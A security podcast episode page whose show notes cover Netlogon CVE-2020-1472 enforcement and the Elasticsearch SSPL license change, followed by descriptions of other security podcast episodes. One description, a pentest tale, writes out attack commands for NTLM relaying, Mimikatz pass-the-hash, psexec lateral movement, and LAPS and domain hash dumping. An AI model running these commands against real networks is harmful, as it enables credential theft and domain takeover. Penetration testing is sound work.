2021-002-Elastic Search license changes, Secure RPC patching for windows, ironkey traps man's $270 million in Bitcoin
Play • 47 min

 

Secure RPC issue - 

Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center

How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (microsoft.com)

Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center

Elastic Search 

https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks

“There are those who will point to the FAQ for the SSPL and claim that the license isn’t interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it’s their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk.”

Doubling down on open, Part II | Elastic Blog  - license change affecting Elastic Search and Kibana

MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org)  

Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com)

@vmbrasseur:  (1) VM (Vicky) Brasseur on Twitter: "With today's relicensing to #SSPL, Elasticsearch & Kibana are no longer #OpenSource but are instead business risks: https://t.co/XNx2EMLNfH" / Twitter

(1) Adam Jacob on Twitter: "Yeah, come on - how can this be "doubling down on open"? Some true duplicity here. https://t.co/rlJVnLxYwP - we're taking two widely used, widely distributed, widely incorporated open source projects and making them no longer open source. But we're doubling down on open!" / Twitter

[License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org)

“We continue to believe that the SSPL complies with the Open Source

Definition and the four essential software freedoms.  However, based on its

reception by the members of this list and the greater open source

community, the community consensus required to support OSI approval does

not currently appear to exist regarding the copyleft provision of SSPL.

Thus, in order to be respectful of the time and efforts of the OSI board

and this list’s members, we are hereby withdrawing the SSPL from OSI

consideration.”

(could be ‘open-source’, but negative feedback on mailing lists and elsewhere made the remove it from consideration from OSI)

Open Source license requirements: The Open Source Definition | Open Source Initiative

What does this mean? 

If you have products that utilize ElasticSearch/MongoDB/Kibana in some way, talk to your legal teams to find out if you need to divest your org from them. These are not ‘opensource’ licenses… they are ‘source available’

It might not affect your organization and moving to SSPL might be feasible. If your product makes any changes internally to ElasticSearch, 

Notable links

JTNYDV  - specifically the CIS docker hardening 

Twitter: @jtnydv

Bug Detected in Linux Mint Virtual Keyboard by Two Kids - E Hacking News - Latest Hacker News and IT Security News

https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/

https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank

https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html

https://www.techradar.com/news/man-has-two-attempts-left-to-unlock-bitcoin-wallet-worth-dollar270-million

https://www.linkedin.com/posts/amandaberlin_podcast-mentalhealth-neurodiversity-activity-6755910847148691456-Lms5

https://www.linkedin.com/posts/amandaberlin_swag-securitybreach-infosecurity-activity-6755884694501498880-yAck

 

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#AmazonMusic: https://brakesec.com/amazonmusic 

#Brakesec Store!: https://brakesec.com/teepub 

#Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora 

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

7 Minute Security
7 Minute Security
Brian Johnson
7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because: * I got to use some of my new CRTP skills! * Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired * Check for misconfigured LAPS installs with Get-LAPSPasswords! * The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective! * When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies! * SharpShares is a cool way to find shares your account has access to. * I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information * Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example: sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin! * Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the mc-mcs-admpwd value - which is the LAPS password! Whooee!!! That's fun! * Armed with all the local admin passwords, I was able to run net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)
52 min
CISO-Security Vendor Relationship Podcast
CISO-Security Vendor Relationship Podcast
Mike Johnson and David Spark
Would You Look at that Unrealistic Licensing Deal?
All links and images for this episode can be found on CISO Series https://cisoseries.com/would-you-look-at-that-unrealistic-licensing-deal/ CISOs know that salespeople want to make the best licensing deal they can possibly get. But unpredictability in the world of cybersecurity makes one-year licensing deals tough, and three-year licensing deals impossible. This episode is hosted by David Spark (@dspark), producer of CISO Series and Mike Johnson. Our guest this week is Mark Eggleston, (@meggleston) CISO, Health Partners Plans. This recording was recorded live in front of a virtual audience at the "SecTalks - Leading with grit in security" virtual conference brought to you by our sponsor, Cobalt. Thanks to our podcast sponsor, Cobalt Cobalt offers a faster more effective pentesting solution through its Pentest as a Service (PtaaS) platform. With it, you can schedule a pentest in as little as 24 hours for all kinds of assets. The platform also connects you with a global pool of pentesters called the Cobalt Core, whose skills can match what you need. And instead of sending you a huge PDF that raises more questions you can’t answer, they engage with your team throughout the pentest. Findings can land straight into Jira and GitHub, helping you fix vulnerabilities as soon as they’re discovered. Cobalt makes pentesting easy, quick to deploy, scalable, and simple to remediate. On this week's episode Why is everybody talking about this now? A redditor is struggling and overwhelmed! The person is in school studying, working, and loving cybersecurity, but has completely and utterly failed the foundations course and is on academic probation. The person told their story to the cybersecurity subreddit community, and the support came out in droves. We've seen this before. People hit a major wall professionally and they just reach out to the anonymous masses for support. The story hits a nerve and the community is eager to show encouragement. In fact, just this past week, the New York Times had an article about the unemployment subreddit offering advice and information to those struggling. We'll take a look at this tactic of reaching out for support and guidance through discussion boards. What do you think of this vendor marketing tactic? "Pro tip to vendors: don’t claim that you can’t do a one-year licensing deal. You might end up with a zero-year license deal", said Ian Amit, CSO, Cimpress on LinkedIn. We'll look at the art of negotiating a contract with a vendor: What is it ultimately you want? What are you willing to concede on and what must you have? And what are the situations that cause this to change? It's time to play, "What's Worse?!" Jason Dance of Greenwich Associates suggests two scenarios that others believe is security, but actually isn't. If you haven’t made this mistake, you’re not in security On Twitter, the CISO of Twitter, Rinki Sethi, said, "A career mistake I made, I rolled out a phishing testing program before the company was ready for it. The HR team said it was against the company culture and if I tried a trick like that again, I would be fired. Lesson - communication is important in #cybersecurity." Rinki asked for others' stories of failure. Let's explore a few. What Is It and Why Do I Care? For this week's game, the topic is vulnerability management. We look at four pitches from four different vendors. Contestants must first answer what "vulnerability management" is in 25 words or less, and secondly must explain what's unique about their vulnerability management solution. These are based on actual pitches - company names and individual identities are hidden. The winners will be revealed at the end.
38 min
Getting Into Infosec
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Dr. Eric Cole - Accidental CIA Hacker To Fortune 500 Security Advisory To Entrepreneur
Dr. Eric Cole is an accomplished cybersecurity hacker and executive advisor. His career has been a mix of sixth-sense chance encounters and wisdom/foresight of the future. His uncanny ability to see the opportunity in cybersecurity combined with the wisdom to listen to those smarter than him is why he is where he is today. His interview is chock full of poignant advice and tips. Dr. Eric Cole also has a creative side to him: he's a musician. He was a French horn player before and now, he's a drummer. He's known as the Tommy Lee of Cybersecurity. Eric Cole's Quick List of Advice Always be respectful, Don't be an A**Hole to other people… but don't give a crap what other people say or think because we're unique and different. If you're an entrepreneur in cybersecurity, they're not gonna get ya. Listen to people that are smarter than you and have made the mistakes before you make them. Life will force you to repeat lessons until you learn them. The biggest gap is in the monitoring, detection, and analyst side. Quotes "It's all about looking at calculated risk, understanding [the] pros and cons, and taking chances." "You've done the same thing six times in a row, and it doesn't work. What makes you think if you do it a seventh time [that] it's actually going to work?" "Try different things." "Have advisory board members for your life." "If the best professionals in the world have coaches, why shouldn't we?" "If people are not listening to your advice, 99% of the time, it's because you didn't answer the right question." "Smart people know the right answer. Brilliant people ask the right question." "Good cybersecurity people solve problems. Great cybersecurity people solve the right problems." "Don't overlook the obvious." "It's never a lack of resources, but a lack of resourcefulness." Getting Into Infosec Other episodes, transcripts, a career guide to Getting Into Infosec: https://gettingintoinfosec.com/ See omnystudio.com/listener for privacy information.
49 min
Hacker Valley Studio
Hacker Valley Studio
Hacker Valley Media
We Are Here Finale: Rep. Yvette Clarke
Hacker Valley Studio presents: We Are Here - an audio journey and series exploring black excellence in technology and cybersecurity. In part three of this series, Ron and Chris interview Congresswoman Yvette Clarke, serving as the U.S. Representative for New York's 9th congressional district since 2013. Congresswoman Clarke’s parents immigrated to Brooklyn, New York in the 1950s from Jamaica. Being born from immigrant parents and witnessing the transformation of the country during the civil rights movement helped shape her worldview. Congresswoman Clarke mentions that the nurture from her family and community sparked her interest in public service at an early age. Congresswoman Clarke recalls being a child and looking up to her pediatrician, Dr. Thompson. Congresswoman Clarke could see herself being like Dr. Thompson and that led her to pursue her interests in STEM in grade school and college. When Congresswoman Clarke went away to college she made a commitment to come back to Brooklyn and use her education to help others As the episode progresses, Congresswoman Clarke mentions her parents were engaged in the community out of necessity. They wanted to be able to navigate the United States and create community for her and her brother. Congresswoman Clarke’s mother started her community outreach at Parent Teacher Association meetings and was encouraged to run for political office after some time. In fact, Congresswoman Clarke became the first and only child to succeed a parent in political office. Congresswoman Clarke describes community as essential and building communities is done through education. Digital transformation has enabled all generations to collaborate on common causes that they previously wouldn’t have had the opportunity to. An example that Congresswoman Clarke provides is narrowing the education gap for children of color. Through technology, parents have been working with government agencies and private organizations to provide more resources to schools in need. Impactful Moments: 0:00 - Hacker Valley Studio presents We Are Here Pt 3 0:52 - Congresswoman Yvette Clarke on Hacker Valley Studio! 1:56 - Early life and how Congresswoman Clarke made it into office 3:38 - What inspired Congresswoman Clarke to help others 7:21 - Surprises while in office and servicing the public 13:35 - Congresswoman Clarke’s story of perseverance 16:36 - The importance of community and how to influence yours 24:40 - Education and mentorship 27:51 - Using technology to course correct and amplify your voice 31:59 - Sage wisdom for embarking on your personal journey Follow Congresswoman Yvette Clarke on LinkedIn, Instagram, and Twitter Learn more about Hacker Valley Studio. Support Hacker Valley Studio on Patreon. Follow Hacker Valley Studio on Twitter. Follow hosts Ron Eddings and Chris Cochran on Twitter.
37 min
More episodes
Search
Clear search
Close search
Google apps
Main menu